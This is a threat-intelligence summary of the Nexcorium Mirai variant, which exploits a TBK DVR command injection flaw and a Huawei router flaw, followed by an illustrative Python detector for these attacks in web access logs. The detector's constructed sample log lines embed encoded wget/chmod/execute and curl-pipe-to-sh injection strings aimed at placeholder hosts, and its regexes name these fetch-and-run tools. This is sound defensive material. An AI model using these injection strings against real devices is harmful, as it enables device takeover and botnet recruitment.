Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign
Essential information
- Published
- 17/04/2026 18:56
- Modified
- 20/04/2026 10:52
- Tags
- 2026-04-17, CVE-2017-17215, CVE-2024-3721, credential brute-force, ddos attacks, iot botnet, mirai, mirai variant, multi-architecture, nexcorium, persistence mechanisms, tbk dvr exploitation
- Related entities
- 2 vulnerabilities (CVE), 14 observables, 1 intrusion set (APT), 19 techniques (MITRE), 2 malware, 1 other
Description
Nexcorium is a multi-architecture Mirai variant that exploits CVE-2024-3721, an OS command injection flaw in TBK DVR devices, to build a botnet for distributed denial-of-service (DDoS) attacks. The campaign is attributed to Nexus Team on the basis of the custom HTTP headers it uses; the injected commands fetch and run payloads built for ARM, MIPS and x86-64. The malware establishes persistence through several mechanisms: init configuration, startup scripts, systemd services and cron jobs. It carries XOR-encoded configuration data, performs self-integrity checks and can replicate itself. Supported attack methods include UDP flood, TCP SYN flood, TCP ACK flood and VSE (Valve Source Engine) query flood, among others. The botnet spreads by brute-forcing default credentials and by exploiting CVE-2017-17215 in Huawei HG532 routers, a combination typical of IoT-focused botnets.
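As an added example (not code from the original report, from Nexus Team or from the malware itself), the following Python script scans web server access log lines for the CVE-2024-3721 request shape, i.e. the publicly documented /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ endpoint with shell metacharacters in the mdb or mdc parameter, and, more generally, for Mirai-style download-and-execute stagers in any request parameter. The log lines, the TEST-NET addresses, the payload URL and the /cgi-bin/upgrade endpoint in the last sample line are constructed for illustration. The Nexus Team custom header is not modelled because the report does not give its value, and the CVE-2017-17215 vector is not modelled because it arrives as a SOAP request to the router's UPnP service rather than as an ordinary web request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Publicly documented CVE-2024-3721 request shape on TBK DVR-4104/DVR-4216:
# /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ with the injected shell
# command carried in the mdb or mdc parameter.
TBK_PATH = "/device.rsp"
TBK_CMD = "___S_O_S_T_R_E_A_MAX___"
TBK_INJECTED_PARAMS = ("mdb", "mdc")

# Shell metacharacters that let an attacker append a command to a parameter value.
SHELL_META = re.compile(r"[;|&`$\n]")
# Mirai-style stager: fetch a payload, then chmod it, pipe it to sh, or exec ./it.
STAGER = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*(\bchmod\b|[|;]\s*sh\b|\./)", re.S)

# Apache/nginx combined-log prefix; only the request line matters here.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (not real traffic): an injection attempt on the
# TBK endpoint, a benign-looking request to the same endpoint, an unrelated
# request, and a stager aimed at a hypothetical endpoint outside the TBK vector.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Apr/2026:18:56:01 +0000] "GET /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F'
    '198.51.100.5%2Fbins%2Fx.arm7%3Bchmod%20777%20x.arm7%3B.%2Fx.arm7 HTTP/1.1" 200 12',
    '198.51.100.20 - - [17/Apr/2026:18:57:44 +0000] "GET /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=0 HTTP/1.1" 200 12',
    '192.0.2.9 - - [17/Apr/2026:18:58:02 +0000] "GET /login.rsp?user=admin HTTP/1.1" 200 330',
    '203.0.113.8 - - [17/Apr/2026:18:59:10 +0000] "POST /cgi-bin/upgrade?url='
    '%60curl%20http%3A%2F%2F198.51.100.5%2Fa.sh%7Csh%60 HTTP/1.1" 404 0',
]


def parse_line(line):
    """Parse one access log line; return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs splits on '&' before percent-decoding, so an encoded '&' or ';'
    # inside an injected command stays within its own parameter value.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return detection tags for one parsed request (empty list if nothing matched)."""
    tags = []
    params = rec["params"]
    cmd = params.get("cmd", [""])[0]
    if rec["path"] == TBK_PATH and params.get("opt") == ["sys"] and cmd == TBK_CMD:
        injected = [p for p in TBK_INJECTED_PARAMS
                    if any(SHELL_META.search(v) for v in params.get(p, []))]
        if injected:
            tags.append("CVE-2024-3721 command injection via " + ",".join(injected))
    # Generalisation beyond the TBK vector: a fetch-and-execute chain in any
    # parameter is the delivery pattern Mirai variants use regardless of the CVE.
    for name, values in params.items():
        if any(STAGER.search(v) for v in values):
            tags.append(f"mirai-style stager in parameter {name}")
    return tags


def scan(lines):
    """Return (source IP, request target, tags) for every line that raised a tag."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["src"], rec["target"], tags))
    return hits


if __name__ == "__main__":
    for src, target, tags in scan(SAMPLE_LOG):
        print(src, target[:60], tags)
```

The endpoint check alone is not enough: the second sample line hits the same path and cmd value and raises nothing, because the metacharacter test on mdb/mdc is what separates an exploitation attempt from the device's own traffic. Matching the stager pattern separately catches the same delivery chain when it is sent to an endpoint this rule does not know about.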